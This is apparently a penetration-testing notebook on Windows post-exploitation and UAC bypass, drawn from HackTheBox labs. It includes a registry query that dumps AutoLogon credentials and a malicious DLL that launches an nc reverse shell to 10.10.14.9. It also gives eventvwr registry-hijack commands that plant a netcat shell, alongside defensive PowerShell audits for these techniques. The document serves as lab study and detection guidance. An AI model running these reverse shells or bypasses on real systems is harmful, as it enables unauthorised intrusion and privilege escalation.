
# Post Exploit Checks

## Post Exploit

* AutoLogon Credentials

```
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
```

* Enumerate open ports

```bash
netstat -ano
```

## Powershell

### PSCredentials

* The PSCredential object is used to perform an authenticated action, or actions, as another user on the machine

```powershell
# create a PSCredential object (user name and password are example values)
$password = ConvertTo-SecureString "DNOscp1234!" -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential("Dhanesh", $password)

# Export the credential to an XML file. The SecureString is protected with DPAPI,
# so only the same user on the same machine can import it again.
$credential | Export-CliXml -Path 'C:\Location\File.xml'

# Import the XML file to obtain the password
$file = Import-CliXml -Path "C:\Location\File.xml"
$file.GetNetworkCredential() | fl

# Extra: list the members of the imported PSCredential object
$file | Get-Member
```
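The export above is protected by DPAPI, which is the security-relevant detail: the password blob is bound to the exporting user and machine, while the user name stays in clear text. The following added example (not code from the original notes) inspects such a file and reports whether the current user and host can decrypt it; the file path is a placeholder.

```powershell
# Added example: triage a credential file written by Export-CliXml.
# The <SS N="Password"> element holds a DPAPI-protected blob, not the password;
# the <S N="UserName"> element is plain text. Path below is a placeholder.
function Test-CliXmlCredentialFile {
    param([Parameter(Mandatory)][string]$Path)

    [xml]$doc = Get-Content -Path $Path -Raw
    $ns = New-Object System.Xml.XmlNamespaceManager($doc.NameTable)
    $ns.AddNamespace('ps', 'http://schemas.microsoft.com/powershell/2004/04')

    $userNode = $doc.SelectSingleNode("//ps:S[@N='UserName']", $ns)
    $blobNode = $doc.SelectSingleNode("//ps:SS[@N='Password']", $ns)
    if ($null -eq $blobNode) {
        throw "No SecureString password element found in $Path"
    }
    $user = if ($userNode) { $userNode.InnerText } else { '<unknown>' }
    $blob = $blobNode.InnerText

    # ConvertTo-SecureString on the hex string calls DPAPI. It only succeeds for
    # the exporting user on the exporting machine (or a matching roaming profile),
    # so failure here means the file is useless outside that scope.
    $decryptable = $false
    try {
        $null = ConvertTo-SecureString -String $blob -ErrorAction Stop
        $decryptable = $true
    } catch { }

    [pscustomobject]@{
        Path            = $Path
        UserName        = $user           # exposed in clear text regardless of DPAPI
        BlobHexLength   = $blob.Length    # size of the protected blob, not the password
        DecryptableHere = $decryptable    # current user/host matches the DPAPI scope
    }
}

Test-CliXmlCredentialFile -Path 'C:\Location\File.xml' | Format-List
```

A file that is decryptable here is a live credential for the current account and should be removed or rotated; one that is not still leaks the account name.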

* Execute a command as another user (RunAs)

```powershell
*Evil-WinRM* PS C:\PSTranscripts\20191203> whoami
megabank\melanie
*Evil-WinRM* PS C:\PSTranscripts\20191203> $password = ConvertTo-SecureString 'Serv3r4Admin4cc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\PSTranscripts\20191203> $cred = New-Object System.Management.Automation.PSCredential('ryan', $password)
*Evil-WinRM* PS C:\PSTranscripts\20191203> invoke-command -ScriptBlock { whoami } -Computer localhost -Credential $cred
megabank\ryan
*Evil-WinRM* PS C:\PSTranscripts\20191203> # resolute machine
```

#### Machine

* Reel - <https://0xdf.gitlab.io/2018/11/10/htb-reel.html#privesc-nico---tom>

## Privilege Escalation

### UAC

* If a user belongs to the Administrators group but cannot execute commands as Admin (for example, cannot move into the Administrator's Desktop), this indicates that UAC is enabled
* Whether a bypass is possible can also be checked with SharpUp.exe

{% embed url="https://github.com/Flangvik/SharpCollection" %}
Compiled Binaries
{% endembed %}

* The output of SharpUp.exe suggests that UAC can be bypassed

![Sharup.exe](/files/uq6v3Y6tQYMGcuuDuO0J)
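The UAC state that SharpUp reports comes from a handful of policy values in the registry. The following added example (not code from the original notes or from SharpUp) reads those values and reports whether auto-elevating Microsoft binaries, which the bypasses in the next section rely on, would run without a prompt; the registry path and value names are the documented Windows policy settings.

```powershell
# Added example: summarise the UAC policy that decides whether auto-elevate
# bypasses apply. Absent values fall back to the Windows defaults noted inline.
function Get-UacPosture {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key -ErrorAction Stop

    # Defaults when a value is missing: EnableLUA 1, ConsentPromptBehaviorAdmin 5,
    # PromptOnSecureDesktop 1, LocalAccountTokenFilterPolicy 0
    $enableLua   = if ($null -ne $p.EnableLUA) { $p.EnableLUA } else { 1 }
    $consent     = if ($null -ne $p.ConsentPromptBehaviorAdmin) { $p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk  = if ($null -ne $p.PromptOnSecureDesktop) { $p.PromptOnSecureDesktop } else { 1 }
    $tokenFilter = if ($null -ne $p.LocalAccountTokenFilterPolicy) { $p.LocalAccountTokenFilterPolicy } else { 0 }

    $level = switch ($consent) {
        0 { 'Never notify: elevate without prompting' }
        1 { 'Prompt for credentials on the secure desktop' }
        2 { 'Always notify: prompt for consent on the secure desktop' }
        3 { 'Prompt for credentials' }
        4 { 'Prompt for consent' }
        5 { 'Prompt for consent for non-Windows binaries (default)' }
        default { "Unknown value $consent" }
    }

    # Auto-elevating Microsoft binaries (eventvwr.exe, SystemPropertiesAdvanced.exe, ...)
    # still prompt at Always notify (2). At every other level with UAC enabled they
    # elevate silently, which is the precondition for the bypasses that follow.
    $autoElevateSilent = ($enableLua -eq 1) -and ($consent -ne 2)
    $hardening = if ($autoElevateSilent) {
        'Set ConsentPromptBehaviorAdmin to 2 (Always notify)'
    } else {
        'Auto-elevate bypasses not applicable at this level'
    }

    [pscustomobject]@{
        UacEnabled                 = ($enableLua -eq 1)
        AdminPromptLevel           = $level
        SecureDesktop              = ($secureDesk -eq 1)
        RemoteLocalAdminUnfiltered = ($tokenFilter -eq 1)   # 1 = no UAC token filtering for remote local-admin logons
        AutoElevateWithoutPrompt   = $autoElevateSilent
        Hardening                  = $hardening
    }
}

Get-UacPosture | Format-List
```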

### UAC Bypass

**General methods by *ivanitlearning* -** [**Here**](https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/)

#### 1. Mounting

![Mounting Bypass](/files/xlWQ5eeTKeCqg9NOVrsc)

* `net use n: \\127.0.0.1\C$` maps the C$ administrative share of the local machine as drive N:

#### 2. DLL Hijacking

{% embed url="https://egre55.github.io/system-properties-uac-bypass" %}
UAC Bypass Via DLL Hijacking
{% endembed %}

1. Create a malicious DLL file

{% code title="pwn.c" %}

```c
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
        case DLL_PROCESS_ATTACH:   // A process is loading the DLL.
            // do stuff
            WinExec("C:\\ProgramData\\nc.exe -e cmd.exe 10.10.14.9 1337", 0);
            break;

        case DLL_THREAD_ATTACH:    // A process is creating a new thread.
            break;

        case DLL_THREAD_DETACH:    // A thread exits normally.
            break;

        case DLL_PROCESS_DETACH:   // A process unloads the DLL.
            break;
    }
    return TRUE;                   // returning FALSE would make the loader fail the load
}
```

{% endcode %}

2\. Compile the malicious DLL

```
sudo apt-get install mingw-w64
i686-w64-mingw32-g++ pwn.c -lws2_32 -o srrstr.dll -shared
```

3\. GreatSCT takes care of the rest

#### 3. Akagi

{% embed url="https://github.com/hfiref0x/UACME" %}

* Compile the binary and use it to bypass UAC

![Shell as Administrator](/files/jZDeanQlZHrWi8uJoyf4)

#### 4. Fileless UAC Bypass

**Windows 7**

* Fileless UAC bypass: no additional application is dropped to disk to bypass UAC
* Registry keys are used to perform the action
* The detailed blog post can be found [here](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/).

Summary:

* When eventvwr.exe starts, it looks up the entry `HKCU\Software\Classes\mscfile\shell\open\command` in the registry.
* By default this key does not exist, so when analysing with Procmon the registry access shows the status **NAME NOT FOUND**.
* eventvwr.exe also accesses the registry at high integrity (it accesses it as the system user).
* We can add the entry ourselves and specify the command to be executed when eventvwr.exe runs.

#### Commands

```bash
# create a registry entry
reg add hkcu\software\classes\mscfile\shell\open\command

# provide the command to be executed 
reg add hkcu\software\classes\mscfile\shell\open\command /d "c:\windows\temp\nc.exe -e cmd.exe 10.10.10.10 1234"

# run eventvwr.exe to execute the command
eventvwr.exe
```

* A shell will be obtained as *NT Authority\System*
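Because `HKCU\Software\Classes` shadows `HKLM\Software\Classes` in the merged HKCR view and `mscfile` has no per-user entry on a clean machine, the existence of that key is itself the indicator of this technique. The following added example (not code from the original notes) audits it and, as a generalisation of the same mechanism, lists every per-user ProgID that carries its own `shell\open\command`.

```powershell
# Added example: detect per-user shell\open\command overrides such as the
# mscfile key that the eventvwr.exe hijack above relies on.
function Get-UserShellOpenOverride {
    param([string[]]$ProgId = @('mscfile'))

    foreach ($id in $ProgId) {
        $userKey    = "HKCU:\Software\Classes\$id\shell\open\command"
        $machineKey = "HKLM:\Software\Classes\$id\shell\open\command"

        # The unnamed (Default) value holds the command line that would be launched
        $userCmd    = if (Test-Path $userKey)    { (Get-ItemProperty -Path $userKey).'(default)' }    else { $null }
        $machineCmd = if (Test-Path $machineKey) { (Get-ItemProperty -Path $machineKey).'(default)' } else { $null }

        [pscustomobject]@{
            ProgId         = $id
            UserOverride   = [bool](Test-Path $userKey)   # should be $false for mscfile
            UserCommand    = $userCmd
            MachineCommand = $machineCmd
            Suspicious     = (Test-Path $userKey) -and ($userCmd -ne $machineCmd)
            Remediation    = if (Test-Path $userKey) { "Remove-Item -Path '$userKey' -Recurse" } else { 'None' }
        }
    }
}

# Generalisation: every ProgID under HKCU\Software\Classes that defines its own
# open command is a candidate for the same per-user hijack, not only mscfile.
function Get-AllUserShellOpenOverrides {
    Get-ChildItem -Path 'HKCU:\Software\Classes' -ErrorAction SilentlyContinue |
        Where-Object { Test-Path "HKCU:\Software\Classes\$($_.PSChildName)\shell\open\command" } |
        ForEach-Object { Get-UserShellOpenOverride -ProgId $_.PSChildName }
}

Get-UserShellOpenOverride | Format-List
Get-AllUserShellOpenOverrides | Format-Table ProgId, UserCommand, Suspicious -AutoSize
```

Run it in the context of each interactive user, since the key lives in that user's hive; a Sysmon registry value-set event on the same path gives the equivalent real-time signal.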

